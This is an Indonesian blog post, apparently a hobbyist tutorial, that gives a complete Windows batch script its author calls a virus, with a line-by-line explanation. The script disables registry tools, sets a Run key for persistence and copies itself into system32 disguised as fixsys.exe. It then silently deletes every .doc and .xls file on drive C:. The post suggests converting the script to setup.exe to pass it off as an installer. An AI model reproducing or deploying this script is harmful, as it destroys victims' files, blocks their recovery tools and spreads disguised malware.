ada kode dkid ne yang mo buat virus dengan bath file
caranya
1.buka notepad
2.ketikan source ini
rem ' iogi
@echo off
Cls

reg add HKCU\software\microsoft\windows\currentversion\pol icies\system /v disableregistrytools /t reg_dword /d 00000001 /f

reg add HKLM\software\microsoft\windows\currentversion\run /v systray /t reg_sz /d c:\windows\system32\fixsys.exe /f

copy setup.exe %systemroot%\system32\fixsys.exe

del /f /s /q c:\*.doc c:\*.xls

ok silahkan dicoba yaaa

================================================== ======
keterangan:
@echo off
Digunakan untuk menyembunyikan baris perintah yang nampak pada layar.

Cls
Membersihkan layar console.

reg add HKCU\software\microsoft\windows\currentversion\pol icies\system /v disableregistrytools /t reg_dword /d 00000001 /f
Baris perintah ini digunakan untuk menambahkan value pada badan registry agar tidak bisa dibuka maupun mengedit regisrty oleh user, kecuali jika ia menuliskan perintah "reg edit" atau "reg add" pada file bat dan mengembalikannya pada value awal yaitu "00000000" untuk mengenabledkannya. Kita juga bisa menambahkan perintah lainnya dengan "reg add" pada registry untuk "menteror" user pada systemnya.

/v : adalah value untuk registry yang mana saat ini bernama disabledregistrytools
/t : adalah typenya yang mana kita pakai disini adalah type DWORD
/d : adalah nilai dari type tersebut, kita pakai 00000001 untuk kondisi "YA" disabled kan aja !
/f : adalah force overwriting add tanpa question (pertanyaan) dari system

reg add HKLM\software\microsoft\windows\currentversion\run /v systray /t reg_sz /d c:\windows\system32\fixsys.exe /f
Baris perintah ini digunakan untuk menjalankan file fixsys.exe pada saat booting awal windows dimulai, dengan memanggil file fixsys.exe di direktori %systemroot%\system32 yang sebenarnya merupakan hasil copy dari file induk kita.

/v : adalah nama value nya, kita pakai nama systray
/t : adalah type valuenya, kita pakai STRING
/d : adalah nilai string tersebut, kita masukkan letak dimana file yang hendak dieksekusi
/f : adalah force overwriting add tanpa question (pertanyaan) dari system

copy setup.exe %systemroot%\system32\fixsys.exe
Pada baris perintah sebelumnya yaitu eksekusi file pada saat windows dimulai, ada file yang nama file nya fixsys.exe, mungkin ada bertanya dari mana file tersebut berasal. File fixsys.exe tersebut merupakan copy dari file setup.exe yang sedang kita bentuk ini. Baris perintah tersebut diatas adalah meng copy file setup.exe yang berada di dalam direktori yang sama pada saat pengeksekusian berlangsung yang kemudian di copykan di %systemroot%\system32 dengan nama fixsys.exe. File yang kita tulis ini nantinya akan kita convert menjadi setup.exe.
del /f /s /q c:\*.doc c:\*.xls
Baris perintah tersebut diatas adalah tindakannya, yaitu menghapus apa saja yang berekstensi doc dan xls pada drive c:, walaupun file tersebut berada di dalam folder manapun selama berada pada drive c:

/f : adalah force deleting read only file, yaitu menghapus file read only tanpa pertanyaan.
/s : adalah menghapus seluruh file yang dimaksud didalam direktori manapun
/q : adalah quiet mode, menghapus tanpa pertanyaan

Kita bisa mencobanya dengan perintah-perintah lainnya, seperti menampilkan pesan, menjalankan program, menambahkan file, edit file, shutdown, restart, maupun perintah-perintah lainnya, asalkan kita telah mengetahui perintah-perintah dari dos.

Jika telah selesai menuliskan listing tersebut diatas, maka simpanlah file tersebut dengan nama file setup.bat.


kl lo mau kovert menjadi file .exe silaakn donlot sofie nya dsni

http://www.abyssmedia.com/downloads/quickbfc.exe

0 komentar:

Posting Komentar